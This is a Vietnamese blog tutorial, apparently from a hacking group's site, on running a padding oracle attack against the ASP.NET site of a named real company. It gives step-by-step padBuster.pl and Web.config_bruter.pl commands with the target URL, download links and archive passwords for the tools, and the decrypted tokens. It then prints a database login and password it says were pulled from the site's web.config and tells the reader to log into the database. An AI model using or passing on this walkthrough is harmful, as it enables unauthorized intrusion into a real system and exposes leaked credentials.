J2TEAM Security: A must-have extension for Chrome users. Install now!

[TUT] Padding Oracle Attack

Victim: http://bigc.vn/

Kiểm tra lỗi Padding Orale


View source:

Chú ý đoạn code sau:

/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"

Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

http://www.activestate.com/activeperl/downloads

Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:

http://www.mediafire.com/?a0auo2tca0ffdfe

Web.config_bruter.pl:

http://www.mediafire.com/?3twc9xwizdcdw8p

pass unlock: soleil_vhb

pass giải nén: ceh.vn

Bước 2: Thực hiện lệnh trên CMD

vào Run command

Cd\

Chạy lệnh:


padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"




Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:

“The ID# marked with ** is recommended: “

Lúc này ta sẽ nhập số 2 và ấn enter



Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:

M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:

Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8

Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:



Kết quả:

u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1

gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1

Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả

Bước 3: Lấy thông tin file config:

http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1

hoặc:

http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1

Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi



Bước 4: login vào Database

Sử dụng tool: MySQL management studio express

http://www.scottsystems.com/products..._ce/downloads/



Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!